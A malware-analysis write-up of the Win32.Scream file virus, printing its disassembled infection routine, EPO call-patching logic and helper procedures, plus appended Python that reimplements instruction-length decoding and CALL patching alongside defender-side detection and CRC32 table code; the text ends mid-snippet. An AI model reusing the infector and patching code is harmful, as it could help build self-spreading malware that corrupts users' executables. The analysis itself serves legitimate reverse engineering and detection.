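add(1 | MODRM, 0x84, 0x85, 0x86, 0x87, 0x88, 0x89, 0x8A, 0x8B, 0x8D, 0x8F,
    0xD0, 0xD1, 0xD2, 0xD3, 0xF6, 0xF7, 0xFE, 0xFF,
    *[b for g in range(0, 0x40, 8) for b in range(g, g + 4)])          # add/or/.../cmp r/m forms
add(1 | MODRM | imm(1), 0x6B, 0x80, 0x83, 0xC0, 0xC1, 0xC6)
add(1 | MODRM | imm(4) | OPSIZE, 0x69, 0x81, 0xC7)
add(2 | MODRM, 0xAF, 0xB6, 0xB7, 0xBE, 0xBF, *range(0x90, 0xA0))       # 0F xx: imul, movzx, movsx, setcc
add(2 | imm(4) | OPSIZE, *range(0x80, 0x90))                           # 0F 8x: jcc rel32

def modrm_size(code, p, addr16):
    """Bytes used by the ModR/M byte at code[p] plus SIB and displacement (DecodeModRM)."""
    mod, rm = code[p] >> 6, code[p] & 7
    if mod == 3:
        return 1
    if addr16:                                    # @@DecodeModRM16: disp16 when mod=00 rm=110
        return 1 + (2 if (mod == 0 and rm == 6) else mod)
    size = 1 + (0, 1, 4)[mod]                     # disp8 / disp32
    if mod == 0 and rm == 5:                      # disp32 with no base register
        size += 4
    if rm == 4:                                   # SIB byte follows
        size += 1
        if mod == 0 and (code[p + 1] & 7) == 5:   # base=101 with mod=00 also means disp32
            size += 4
    return size

def insn_length(code, p=0):
    """Length of the instruction at code[p]; 0 when the opcode is unknown (ILE returns CF set)."""
    start, opsize16, addr16 = p, False, False
    while p < len(code) and code[p] in PREFIXES:                 # GetPrefixes
        opsize16, addr16 = opsize16 or code[p] == 0x66, addr16 or code[p] == 0x67
        p += 1
    flags = TABLE.get(bytes(code[p:p + 2])) or TABLE.get(bytes(code[p:p + 1]))   # FindOpcode
    if flags is None:
        return 0
    op = code[p + (flags & 3) - 1]
    p += flags & 3
    if op in (0xF6, 0xF7) and (flags & 3) == 1 and (code[p] & 0x38) == 0:       # TEST r/m, imm
        flags = (flags | imm(1)) & 0x3F if op == 0xF6 else (flags | imm(4) | OPSIZE) & ~imm(1)
    if flags & MODRM:
        p += modrm_size(code, p, addr16)
    immsize = flags >> 5
    if opsize16 and flags & OPSIZE:                               # imm32 becomes imm16 under 66h
        immsize -= 2
    return p + immsize - start

def find_epo_spots(code, min_len=5):
    """Linear walk as in @@GetNextInstruction: (offset, length) of every instruction at
    least min_len bytes long, the 'cmp ecx, 5' minimum for a 5-byte E8 call to fit."""
    spots, p = [], 0
    while p < len(code):
        n = insn_length(code, p)
        if n == 0:
            break
        if n >= min_len:
            spots.append((p, n))
        p += n
    return spots

def patch_epo(code, offset, section_rva, image_base, virus_rva):
    """Overwrite the instruction at offset with CALL virus_rva and build the 9-byte record
    @@SetNextEPO keeps: VA of the byte after the call, then the 5 overwritten bytes."""
    ret_rva = section_rva + offset + 5
    rel32 = (virus_rva - ret_rva) & 0xFFFFFFFF                    # 'sub eax, [ebp+2b0h]; neg eax'
    record = struct.pack('<I5s', image_base + ret_rva, code[offset:offset + 5])
    patched = code[:offset] + b'\xE8' + struct.pack('<I', rel32) + code[offset + 5:]
    return patched, record
```

Running find_epo_spots over a constructed prologue such as push ebp / mov ebp, esp / sub esp, 10h / call rel32 / mov eax, [esp+20h] / lea edi, [edi+eax-70e44324h] / ret yields the call and the lea as the only 5-byte-or-longer candidates; patch_epo on the lea leaves its last two bytes in place, exactly as the virus's stosb/stosd does, which is why the saved record carries the VA of the byte after the call rather than of the next original instruction.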

CODE:004037C4 CODE:004037C6 mov ebx, esi CODE:004037C8 jmp short @@GetFileNameAndEndOfFileName CODE:004037C8 CODE:004037CA CODE:004037CA CODE:004037CA @@GotFileNameAndEndOfIt: CODE:004037CA xchg esi, edi CODE:004037CC cmp dword ptr [edi-5], 'EXE.' CODE:004037D3 jz short @@FileExtensionIsOk CODE:004037D3 CODE:004037D5 cmp dword ptr [edi-5], 'LPC.' CODE:004037DC jz short @@FileExtensionIsOk CODE:004037DC CODE:004037DE cmp dword ptr [edi-5], 'CXO.' CODE:004037E5 jz short @@FileExtensionIsOk CODE:004037E5 CODE:004037E7 cmp dword ptr [edi-5], 'RCS.' CODE:004037EE jnz @@NotInfectable CODE:004037EE CODE:004037F4 CODE:004037F4 @@FileExtensionIsOk: CODE:004037F4 CODE:004037F4 lea edi, Shit_List_Table CODE:004037FA xchg edi, esi CODE:004037FA CODE:004037FC CODE:004037FC @@CheckIfShitlisted: CODE:004037FC lodsw CODE:004037FE cmp [ebx], ax CODE:00403801 jz @@NotInfectable CODE:00403801 CODE:00403807 test ax, ax CODE:0040380A jnz short @@CheckIfShitlisted CODE:0040380A CODE:0040380C cmp dword ptr [ebx], 'TAOG' CODE:00403812 jnz @@NotInfectable CODE:00403812 CODE:00403818 mov ecx, [ebp+15ch] CODE:0040381E cmp ecx, 8000h CODE:00403824 jnb short @@CheckMaxFileSize CODE:00403824 CODE:00403826 mov eax, 0Ah CODE:0040382B call RandomNumber CODE:0040382B CODE:00403830 test eax, eax CODE:00403832 jnz @@NotInfectable CODE:00403832 CODE:00403838 CODE:00403838 @@CheckMaxFileSize: CODE:00403838 cmp ecx, 100000h CODE:0040383E jbe short @@FileSizeIsOk CODE:0040383E CODE:00403840 mov eax, 20h CODE:00403845 call RandomNumber CODE:00403845 CODE:0040384A test eax, eax

CODE:0040384C jnz @@NotInfectable CODE:0040384C CODE:00403852 CODE:00403852 @@FileSizeIsOk: CODE:00403852 cmp SFC_enabled, 0 CODE:00403859 jnz short @@NoSFC CODE:00403859 CODE:0040385B push ebx CODE:0040385C push 0 CODE:0040385E mov al, 21h CODE:00403860 call StealthAPI CODE:00403860 CODE:00403865 test eax, eax CODE:00403867 jnz @@NotInfectable CODE:00403867 CODE:0040386D CODE:0040386D @@NoSFC: CODE:0040386D push 80h CODE:00403872 push edi CODE:00403873 mov al, 11h CODE:00403875 call StealthAPI CODE:00403875 CODE:0040387A test eax, eax CODE:0040387C jz @@NotInfectable CODE:0040387C CODE:00403882 lea eax, [ebp+168h] CODE:00403888 push 0 CODE:0040388A push 80h CODE:0040388F push 3 CODE:00403891 push 0 CODE:00403893 push 0 CODE:00403895 push 0C0000000h CODE:0040389A push eax CODE:0040389B mov al, 14h CODE:0040389D call StealthAPI CODE:0040389D CODE:004038A2 mov [ebp+134h], eax CODE:004038A8 inc eax CODE:004038A9 jz @@RestoreAttributes CODE:004038A9 CODE:004038AF mov ecx, [ebp+15ch] CODE:004038B5 call MapFile CODE:004038B5 CODE:004038BA jz @@CloseFile CODE:004038BA CODE:004038C0 cmp word ptr [eax], 'ZM' CODE:004038C5 jnz @@UnMapFile CODE:004038C5 CODE:004038CB xor edx, edx CODE:004038CD call GetSection CODE:004038CD CODE:004038D2 cmp dword ptr [esi], 'EP' CODE:004038D8 jnz @@UnMapFile CODE:004038D8 CODE:004038DE test dword ptr [ebx+24h], 20000000h CODE:004038E5 jnz @@UnMapFile CODE:004038E5

CODE:004038EB mov eax, [esi+50h] CODE:004038EE cmp eax, [ebp+15ch] CODE:004038F4 jnz @@UnMapFile CODE:004038F4 CODE:004038FA mov eax, [ebx+10h] CODE:004038FD test eax, eax CODE:004038FF jz @@UnMapFile CODE:004038FF CODE:00403905 sub eax, [ebx+8] CODE:00403908 neg eax CODE:0040390A jge short @@VirtualSizeIsGreaterOrEqual CODE:0040390A CODE:0040390C mov eax, [ebx+10h] CODE:0040390F mov [ebx+8], eax CODE:00403912 xor eax, eax CODE:00403912 CODE:00403914 CODE:00403914 @@VirtualSizeIsGreaterOrEqual: CODE:00403914 mov [ebp+288h], eax CODE:0040391A add eax, 368Ch CODE:0040391F add eax, [ebx+10h] CODE:00403922 add eax, [ebx+14h] CODE:00403925 mov ecx, [esi+3ch] CODE:00403928 add eax, ecx CODE:0040392A div ecx CODE:0040392C mul ecx CODE:0040392E mov [esi+50h], eax CODE:00403931 mov [ebp+28ch], eax CODE:00403937 push eax CODE:00403938 push dword ptr [ebp+284h] CODE:0040393E mov al, 0Ah CODE:00403940 call StealthAPI CODE:00403940 CODE:00403945 push dword ptr [ebp+138h] CODE:0040394B mov al, 5 CODE:0040394D call StealthAPI CODE:0040394D CODE:00403952 pop ecx CODE:00403953 call MapFile CODE:00403953 CODE:00403958 jz @@CloseFile CODE:00403958 CODE:0040395E call GetSection CODE:0040395E CODE:00403963 mov edi, [ebx+14h] CODE:00403966 add edi, [ebx+10h] CODE:00403969 add edi, [ebp+284h] CODE:0040396F mov ecx, [ebp+288h] CODE:00403975 jecxz short @@NoSectionPadding CODE:00403975 CODE:00403977 add [ebx+10h], ecx CODE:0040397A xor eax, eax CODE:0040397C rep stosb CODE:0040397C CODE:0040397E CODE:0040397E @@NoSectionPadding: CODE:0040397E mov [ebp+2b4h], edi

CODE:00403984 push esi CODE:00403985 mov ecx, 368Ch CODE:0040398A lea esi, EntryPoint CODE:00403990 rep movsb CODE:00403992 pop esi CODE:00403993 pusha CODE:00403994 mov edx, [ebx+0ch] CODE:00403997 add edx, [ebx+10h] CODE:0040399A mov [ebp+2b0h], edx CODE:004039A0 add edx, [esi+34h] CODE:004039A3 lea eax, EntryPoint CODE:004039A9 sub edx, eax CODE:004039AB lea esi, [edi-368ch] CODE:004039B1 sub edi, 88Ah CODE:004039B7 call HMA CODE:004039B7 CODE:004039BC lea edi, [esi+2f3eh] CODE:004039C2 mov ecx, 20h CODE:004039C7 xor eax, eax CODE:004039C9 rep stosb CODE:004039CB lea edi, [esi+2f16h] CODE:004039D1 lea esi, [esi+276ah] CODE:004039D7 push 0FFFFFh CODE:004039DC push 698h CODE:004039E1 push esi CODE:004039E2 push edi CODE:004039E3 call RDKE32Encrypt CODE:004039E3 CODE:004039E8 popa CODE:004039E9 mov eax, 368Ch CODE:004039EE mov ecx, [esi+3ch] CODE:004039F1 add eax, ecx CODE:004039F3 xor edx, edx CODE:004039F5 div ecx CODE:004039F7 mul ecx CODE:004039F9 add [ebx+10h], eax CODE:004039FC add [ebx+8], eax CODE:004039FF sub eax, 368Ch CODE:00403A04 xchg eax, ecx CODE:00403A05 xor eax, eax CODE:00403A07 rep stosb CODE:00403A09 mov dword ptr [ebx+24h], 0E0000020h CODE:00403A10 add dword ptr [esi+64h], 2000h CODE:00403A17 pusha CODE:00403A18 call GetSection CODE:00403A18 CODE:00403A1D CODE:00403A1D @@ChangeSectionFlags: CODE:00403A1D or dword ptr [eax+24h], 0E0000000h CODE:00403A24 add eax, 28h CODE:00403A27 cmp eax, ebx CODE:00403A29 jnz short @@ChangeSectionFlags CODE:00403A29 CODE:00403A2B popa CODE:00403A2C call GetSection CODE:00403A2C CODE:00403A31 mov ebx, [esi+28h]

CODE:00403A34 xchg eax, esi CODE:00403A35 sub esi, 28h CODE:00403A35 CODE:00403A38 CODE:00403A38 @@TryNextSection: CODE:00403A38 CODE:00403A38 add esi, 28h CODE:00403A3B mov eax, [esi+0ch] CODE:00403A3E cmp eax, ebx CODE:00403A40 ja short @@TryNextSection CODE:00403A40 CODE:00403A42 add eax, [esi+8] CODE:00403A45 cmp eax, ebx CODE:00403A47 jb short @@TryNextSection CODE:00403A47 CODE:00403A49 mov [ebp+290h], esi CODE:00403A4F or dword ptr [esi+24h], 80000000h CODE:00403A56 mov edi, [ebp+284h] CODE:00403A5C mov edx, [esi+14h] CODE:00403A5F add edx, edi CODE:00403A61 mov [ebp+294h], edx CODE:00403A67 add edx, [esi+10h] CODE:00403A6A mov [ebp+298h], edx CODE:00403A70 sub ebx, [esi+0ch] CODE:00403A73 add ebx, [esi+14h] CODE:00403A76 lea esi, [ebx+edi] CODE:00403A79 sub esp, 400h CODE:00403A7F mov [ebp+2a4h], esp CODE:00403A85 and dword ptr [ebp+2a0h], 0 CODE:00403A8C mov eax, 10h CODE:00403A91 call RandomNumber CODE:00403A91 CODE:00403A96 inc eax CODE:00403A97 mov [ebp+2ach], eax CODE:00403A9D and dword ptr [ebp+2a8h], 0 CODE:00403AA4 mov dword ptr [ebp+2fch], 10000h CODE:00403AA4 CODE:00403AAE CODE:00403AAE @@GetNextInstruction: CODE:00403AAE CODE:00403AAE cmp esi, [ebp+294h] CODE:00403AB4 jb short @@PopEIPFromDatabase CODE:00403AB4 CODE:00403AB6 cmp esi, [ebp+298h] CODE:00403ABC ja short @@PopEIPFromDatabase CODE:00403ABC CODE:00403ABE call ILE CODE:00403ABE CODE:00403AC3 test ecx, ecx CODE:00403AC5 jz short @@PopEIPFromDatabase CODE:00403AC5 CODE:00403AC7 dec dword ptr [ebp+2fch] CODE:00403ACD jz @@FinishedEPOSearch CODE:00403ACD CODE:00403AD3 cmp ecx, 5 CODE:00403AD6 jb @@SpotIsNotAvailable CODE:00403AD6

CODE:00403ADC cmp dword ptr [ebp+2b8h], 0 CODE:00403AE3 jz short @@CheckSpotProbability CODE:00403AE3 CODE:00403AE5 dec dword ptr [ebp+2b8h] CODE:00403AEB jmp @@SpotIsNotAvailable CODE:00403AEB CODE:00403AF0 CODE:00403AF0 CODE:00403AF0 @@PopEIPFromDatabase: CODE:00403AF0 CODE:00403AF0 mov ecx, [ebp+2a0h] CODE:00403AF6 test ecx, ecx CODE:00403AF8 jz @@FinishedEPOSearch CODE:00403AF8 CODE:00403AFE mov esi, [ebp+2a4h] CODE:00403B04 dec ecx CODE:00403B05 lea esi, [esi+ecx*4] CODE:00403B08 mov esi, [esi] CODE:00403B0A dec dword ptr [ebp+2a0h] CODE:00403B10 jmp short @@GetNextInstruction CODE:00403B10 CODE:00403B12 CODE:00403B12 CODE:00403B12 @@CheckSpotProbability: CODE:00403B12 push eax CODE:00403B13 mov eax, 64h CODE:00403B18 call RandomNumber CODE:00403B18 CODE:00403B1D test eax, eax CODE:00403B1F pop eax CODE:00403B20 jnz short @@SpotIsNotAvailable CODE:00403B20 CODE:00403B22 mov edi, [ebp+2a8h] CODE:00403B28 cmp edi, [ebp+2ach] CODE:00403B2E jz @@FinishedEPOSearch CODE:00403B2E CODE:00403B34 pusha CODE:00403B35 mov ebx, esi CODE:00403B37 lea esi, [ebp+2bch] CODE:00403B3D mov ecx, [ebp+2a8h] CODE:00403B43 jecxz short @@NoEPOSpots CODE:00403B43 CODE:00403B45 CODE:00403B45 @@FindDuplicateEPO: CODE:00403B45 lodsd CODE:00403B46 cmp eax, ebx CODE:00403B48 jnz short @@NoDuplicateFoundYet CODE:00403B48 CODE:00403B4A popa CODE:00403B4B jmp short @@SpotIsNotAvailable CODE:00403B4B CODE:00403B4D CODE:00403B4D CODE:00403B4D @@NoDuplicateFoundYet: CODE:00403B4D loop @@FindDuplicateEPO CODE:00403B4D CODE:00403B4F

CODE:00403B4F @@NoEPOSpots: CODE:00403B4F popa CODE:00403B50 mov [ebp+edi*4+2bch], esi CODE:00403B57 inc dword ptr [ebp+2a8h] CODE:00403B5D push eax CODE:00403B5E mov eax, 40h CODE:00403B63 call RandomNumber CODE:00403B63 CODE:00403B68 mov [ebp+2b8h], eax CODE:00403B6E pop eax CODE:00403B6E CODE:00403B6F CODE:00403B6F @@SpotIsNotAvailable: CODE:00403B6F CODE:00403B6F pusha CODE:00403B70 pusha CODE:00403B71 xchg eax, edx CODE:00403B72 mov edi, esi CODE:00403B74 test bl, 10b CODE:00403B77 jz short @@IsOneByte CODE:00403B77 CODE:00403B79 mov ebx, 24h CODE:00403B7E cmp dx, 0F80h CODE:00403B83 jz short @@SpecialOpcodeFound CODE:00403B83 CODE:00403B85 cmp dx, 0F88h CODE:00403B8A jnz short @@DoneCheckingSpecial CODE:00403B8A CODE:00403B8C CODE:00403B8C @@SpecialOpcodeFound: CODE:00403B8C CODE:00403B8C lea esi, SpecialHandlers CODE:00403B92 add ebx, esi CODE:00403B94 jmp ebx CODE:00403B94 CODE:00403B96 CODE:00403B96 CODE:00403B96 @@IsOneByte: CODE:00403B96 lea esi, EIPOpcodeTable CODE:00403B96 CODE:00403B9C CODE:00403B9C @@NextSubTable: CODE:00403B9C lodsb CODE:00403B9D movzx ecx, al CODE:00403BA0 jecxz short @@CheckJMPModRM CODE:00403BA0 CODE:00403BA2 lodsd CODE:00403BA3 xchg eax, ebx CODE:00403BA3 CODE:00403BA4 CODE:00403BA4 @@NextEntryInSubTable: CODE:00403BA4 lodsb CODE:00403BA5 cmp al, dl CODE:00403BA7 jz short @@SpecialOpcodeFound CODE:00403BA7 CODE:00403BA9 loop @@NextEntryInSubTable CODE:00403BA9

CODE:00403BAB jmp short @@NextSubTable

CODE:00403BAD @@CheckJMPModRM:
CODE:00403BAD cmp dl, 0FFh
CODE:00403BB0 jnz short @@DoneCheckingSpecial
CODE:00403BB2 mov esi, edi
CODE:00403BB4 inc esi
CODE:00403BB5 lodsb
CODE:00403BB6 and al, 38h
CODE:00403BB8 cmp al, 20h
CODE:00403BBA jz SpecialHandlers

CODE:00403BC0 @@DoneCheckingSpecial:
CODE:00403BC0 popa
CODE:00403BC1 clc

CODE:00403BC2 @@ReturnFromSpecialHandler:
CODE:00403BC2 popa
CODE:00403BC3 jb @@GetNextInstruction
CODE:00403BC9 add esi, ecx
CODE:00403BCB jmp @@GetNextInstruction

CODE:00403BD0 @@FinishedEPOSearch:
CODE:00403BD0 mov eax, [ebp+2a4h]
CODE:00403BD6 lea esp, [eax+400h]
CODE:00403BDC mov ecx, [ebp+2a8h]
CODE:00403BE2 jecxz short @@UnMapFile

CODE:00403BE4 @@SetNextEPO:
CODE:00403BE4 dec ecx
CODE:00403BE5 mov esi, [ebp+ecx*4+2bch]
CODE:00403BEC push esi
CODE:00403BED imul edi, ecx, 9
CODE:00403BF0 add edi, [ebp+2b4h]
CODE:00403BF6 add edi, 2F93h
CODE:00403BFC push edi
CODE:00403BFD movsb
CODE:00403BFE movsd
CODE:00403BFF call GetSection
CODE:00403C04 pop edx
CODE:00403C05 pop edi
CODE:00403C06 mov al, 0E8h
CODE:00403C08 stosb
CODE:00403C09 lea eax, [edi+4]

CODE:00403C0C sub eax, [ebp+294h]
CODE:00403C12 mov ebx, [ebp+290h]
CODE:00403C18 add eax, [ebx+0ch]
CODE:00403C1B push dword ptr [esi+34h]
CODE:00403C1E pop dword ptr [edx-4]
CODE:00403C21 add [edx-4], eax
CODE:00403C24 sub eax, [ebp+2b0h]
CODE:00403C2A neg eax
CODE:00403C2C stosd
CODE:00403C2D test ecx, ecx
CODE:00403C2F jnz short @@SetNextEPO
CODE:00403C31 push 0
CODE:00403C33 mov eax, esp
CODE:00403C35 push 0
CODE:00403C37 push esp
CODE:00403C38 push eax
CODE:00403C39 push dword ptr [ebp+28ch]
CODE:00403C3F push dword ptr [ebp+284h]
CODE:00403C45 mov al, 20h
CODE:00403C47 call StealthAPI
CODE:00403C4C mov ebx, [esp+46ch+var_46c]
CODE:00403C4F mov [eax+58h], ebx
CODE:00403C52 add esp, 8
CODE:00403C55 inc dword ptr [ebp+280h]

CODE:00403C5B @@UnMapFile:
CODE:00403C5B push dword ptr [ebp+284h]
CODE:00403C61 mov al, 0Ah
CODE:00403C63 call StealthAPI

CODE:00403C68 @@CloseFile:
CODE:00403C68 push dword ptr [ebp+138h]
CODE:00403C6E mov al, 5
CODE:00403C70 call StealthAPI
CODE:00403C75 lea eax, [ebp+150h]
CODE:00403C7B push eax
CODE:00403C7C lea eax, [ebp+148h]
CODE:00403C82 push eax
CODE:00403C83 lea eax, [ebp+140h]
CODE:00403C89 push eax
CODE:00403C8A push dword ptr [ebp+134h]
CODE:00403C90 mov al, 12h
CODE:00403C92 call StealthAPI
CODE:00403C97 push dword ptr [ebp+134h]
CODE:00403C9D mov al, 5
CODE:00403C9F call StealthAPI

CODE:00403CA4 @@RestoreAttributes:

CODE:00403CA4 lea eax, [ebp+168h]
CODE:00403CAA push dword ptr [ebp+13ch]
CODE:00403CB0 push eax
CODE:00403CB1 mov al, 11h
CODE:00403CB3 call StealthAPI

CODE:00403CB8 @@NotInfectable:
CODE:00403CB8 xor ebx, ebx
CODE:00403CBA push dword ptr [ebp+0f0h]
CODE:00403CC0 pop dword ptr fs:[ebx]
CODE:00403CC3 popa
CODE:00403CC4 and InfectState, 0
CODE:00403CCB retn
CODE:00403CCB InfectFile endp

CODE:00403CF3 SpecialHandlers:
CODE:00403CF3 popa
CODE:00403CF4 popa
CODE:00403CF5 jmp @@PopEIPFromDatabase

The previous code checks whether a file can be infected, and infects it if possible. The virus infects EXE, CPL, OCR and SCR files. It sets RWX on all sections. The infected files are checksummed (PE header). It also avoids self-extractors. It saves the file time and attributes. It infects only files within a certain size interval (32 KB to 1024 KB), with some random exceptions. The X (executable) flag on the last section is the infection mark. It avoids files that are protected by SFC/SFP/WFP. The infection code is encrypted with RDKE32.

CODE:00403D78 GetSection proc near
CODE:00403D78 mov esi, [ebp+284h]
CODE:00403D7E add esi, [esi+3ch]
CODE:00403D81 movzx eax, word ptr [esi+14h]
CODE:00403D85 lea eax, [eax+esi+18h]
CODE:00403D89 movzx ebx, word ptr [esi+6]
CODE:00403D8D dec ebx
CODE:00403D8E imul ebx, 28h
CODE:00403D91 add ebx, eax
CODE:00403D93 retn
CODE:00403D93 GetSection endp

The previous code block calculates a pointer to the last section header of the mapped file (e_lfanew at 3Ch, SizeOfOptionalHeader at PE+14h, NumberOfSections at PE+6, 28h bytes per section header); the result is left in EBX.

CODE:00403D94 MapFile proc near
CODE:00403D94 push 0
CODE:00403D96 push ecx
CODE:00403D97 push 0
CODE:00403D99 push 4
CODE:00403D9B push 0
CODE:00403D9D push dword ptr [ebp+134h]
CODE:00403DA3 mov al, 0Bh
CODE:00403DA5 call StealthAPI

CODE:00403DAA test eax, eax
CODE:00403DAC jz short @@ErrorWhenMapping
CODE:00403DAE mov [ebp+138h], eax
CODE:00403DB4 push 0
CODE:00403DB6 push 0
CODE:00403DB8 push 0
CODE:00403DBA push 6
CODE:00403DBC push eax
CODE:00403DBD mov al, 9
CODE:00403DBF call StealthAPI
CODE:00403DC4 mov [ebp+284h], eax

CODE:00403DCA @@ErrorWhenMapping:
CODE:00403DCA test eax, eax
CODE:00403DCC retn
CODE:00403DCC MapFile endp

The previous code block maps the file into memory for easy access.

CODE:00403DCD HMA proc near
CODE:00403DCD pusha

CODE:00403DCE @@NextInstruction:
CODE:00403DCE push esi
CODE:00403DCF push edx
CODE:00403DD0 call ILE
CODE:00403DD5 add esi, edx
CODE:00403DD7 pop edx
CODE:00403DD8 or bh, bh
CODE:00403DDA jnz short @@Nope
CODE:00403DDC inc esi
CODE:00403DDD cmp al, 0A1h
CODE:00403DDF jz short @@PatchIt
CODE:00403DE1 cmp al, 0A3h
CODE:00403DE3 jz short @@PatchIt
CODE:00403DE5 dec esi
CODE:00403DE6 test bl, 4
CODE:00403DE9 jz short @@Nope
CODE:00403DEB and bl, 3
CODE:00403DEE add esi, ebx
CODE:00403DF0 lodsb
CODE:00403DF1 and al, 0C7h
CODE:00403DF3 cmp al, 5
CODE:00403DF5 jnz short @@Nope

CODE:00403DF7 @@PatchIt:
CODE:00403DF7 add [esi], edx

CODE:00403DF9 @@Nope:
CODE:00403DF9 pop esi
CODE:00403DFA add esi, ecx
CODE:00403DFC cmp esi, edi
CODE:00403DFE jnz short @@NextInstruction
CODE:00403E00 popa
CODE:00403E01 retn
CODE:00403E01 HMA endp

The previous code block is the main entry routine for the hard-coded memory access (HMA) fixup. The function expects the start of the code in the ESI register, the new offsets in the EDI register and the delta offset in the EBP register.

CODE:0040472D FRC_MakeCRC32Table proc near
CODE:0040472D pusha
CODE:0040472E cld

CODE:0040472F @@AnotherEntry:
CODE:0040472F mov al, [esi]
CODE:00404731 test al, al
CODE:00404733 jnz short @@MoreEntriesLeft
CODE:00404735 popa
CODE:00404736 retn

CODE:00404737 @@MoreEntriesLeft:
CODE:00404737 call GetCRC32OfString
CODE:0040473C xchg eax, ebx
CODE:0040473D stosd
CODE:0040473E jmp short @@AnotherEntry
CODE:0040473E FRC_MakeCRC32Table endp

The previous code block creates a CRC32 table for the virus to use later: it walks a list of NUL-terminated strings until it hits an empty one and stores one dword per string.

CODE:00404740 FRC_FakeHost
CODE:00404740 dd 90909090h, 0FFB99090h, 90FFFFFFh, 68006A90h

CODE:00404750 dd offset NAME_SFC_DLL
CODE:00404754 db 68h
CODE:00404755 dd offset NAME_IMAGEHLP_DLL
CODE:00404759 db 6Ah, 0, 0E8h
CODE:0040475C dd 40Bh, 0F8E8006Ah
CODE:00404764 db 3, 2 dup(0)

The previous code block is the fake host of the virus. It shows a message and then exits.

5. Conclusion

So, this was a journey through Win32.Scream. And that was an interesting one. So far I have reversed all of its internals and documented it well. You'll find more information in each separate file that is found in the package.

6. Contact

You can either contact me by e-mail or IM. Feel free to write/send me your comments, ideas, feedback or criticism. For better security it would be better if you send me mails signed with my key, but it's not mandatory.

E-Mail: iamhalsten [at] gmail [dot] com
IM: iamhalsten [at] hotmail [dot] com
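Added example, not code from the original analysis and not the virus's own code: a defender-side check in Python that walks the section table with the same offsets GetSection uses (e_lfanew at 3Ch, NumberOfSections at PE+6, SizeOfOptionalHeader at PE+14h, 28h bytes per header) and evaluates the two on-disk marks named in the infection summary, the executable flag on the last section and RWX on every section. The `build_sample_pe` helper and the header-only image it produces are assumptions made for the test; real files are read from disk instead. A clean file whose last section happens to be executable trips the first check on its own, so only both indicators together are treated as suspicious.

```python
import struct

# Section characteristics bits from the PE specification.
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
RWX = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
SECTION_HEADER_SIZE = 0x28  # the 28h that GetSection multiplies by


def section_headers(image):
    """Walk the section table using the offsets GetSection reads:
    e_lfanew at 3Ch, NumberOfSections at PE+6, SizeOfOptionalHeader at
    PE+14h, first header at PE+18h+SizeOfOptionalHeader.
    Returns [(name, characteristics), ...] in table order."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    (num_sections,) = struct.unpack_from("<H", image, e_lfanew + 6)
    (size_of_opt,) = struct.unpack_from("<H", image, e_lfanew + 0x14)
    first = e_lfanew + 0x18 + size_of_opt
    headers = []
    for i in range(num_sections):
        off = first + i * SECTION_HEADER_SIZE
        name = image[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        (flags,) = struct.unpack_from("<I", image, off + 0x24)  # Characteristics
        headers.append((name, flags))
    if not headers:
        raise ValueError("no sections")
    return headers


def scream_indicators(image):
    """The two on-disk marks from the analysis: X on the last section and
    RWX on all sections. Either alone occurs in clean binaries; together
    they warrant a closer look (header checksum, entry point, overlay)."""
    headers = section_headers(image)
    last_exec = bool(headers[-1][1] & IMAGE_SCN_MEM_EXECUTE)
    all_rwx = all((flags & RWX) == RWX for _, flags in headers)
    return {
        "last_section_executable": last_exec,
        "all_sections_rwx": all_rwx,
        "suspicious": last_exec and all_rwx,
    }


def build_sample_pe(sections):
    """Constructed header-only PE32 image for testing (assumption: not a
    real file, only enough structure for the walk above).
    `sections` is a list of (name, characteristics)."""
    e_lfanew = 0x40
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    size_of_opt = 0xE0  # PE32 optional header size
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    file_header = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0,
                              size_of_opt, 0x0102)
    optional = bytearray(size_of_opt)
    struct.pack_into("<H", optional, 0, 0x10B)  # PE32 magic
    table = b""
    for i, (name, flags) in enumerate(sections):
        table += name.encode("ascii").ljust(8, b"\0")
        # VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
        # PointerToRelocations, PointerToLinenumbers, NumberOfRelocations,
        # NumberOfLinenumbers, Characteristics
        table += struct.pack("<IIIIIIHHI", 0x1000, 0x1000 * (i + 1), 0x200,
                             0x400 + 0x200 * i, 0, 0, 0, 0, flags)
    return bytes(dos) + b"PE\0\0" + file_header + bytes(optional) + table


if __name__ == "__main__":
    samples = {
        "clean": [(".text", IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE),
                  (".data", IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)],
        "marked": [(".text", RWX), (".data", RWX), (".rsrc", RWX)],
    }
    for label, layout in samples.items():
        print(label, scream_indicators(build_sample_pe(layout)))
```

On a real file, call `scream_indicators(open(path, "rb").read())`; the walk only touches the headers, so the whole image need not be valid beyond the section table, which is exactly why the check is cheap enough to run over a directory tree.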
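The FRC_MakeCRC32Table loop above stores one dword per NUL-terminated string and stops at an empty string. Added example, not from the original analysis: the same table built in Python, plus the inverse an analyst needs when such dwords are recovered from a sample, mapping them back to names from a candidate list. The polynomial is an assumption: zlib's standard CRC-32 is used because GetCRC32OfString is not shown in this section and Scream's variant may differ; the string list is constructed for the test and is not taken from the virus body.

```python
import zlib


def crc32_of_string(s):
    """CRC-32 of an ASCII string. Assumption: the standard (zlib/IEEE)
    polynomial; Scream's GetCRC32OfString is not shown here and may differ."""
    return zlib.crc32(s.encode("ascii")) & 0xFFFFFFFF


def parse_name_list(blob):
    """Split a run of NUL-terminated strings ended by an empty string, the
    layout FRC_MakeCRC32Table walks (it returns on a leading NUL byte)."""
    names = []
    pos = 0
    while blob[pos] != 0:
        end = blob.index(b"\0", pos)
        names.append(blob[pos:end].decode("ascii"))
        pos = end + 1
    return names


def make_crc32_table(blob):
    """One dword per string, in list order, like the stosd loop above."""
    return [crc32_of_string(n) for n in parse_name_list(blob)]


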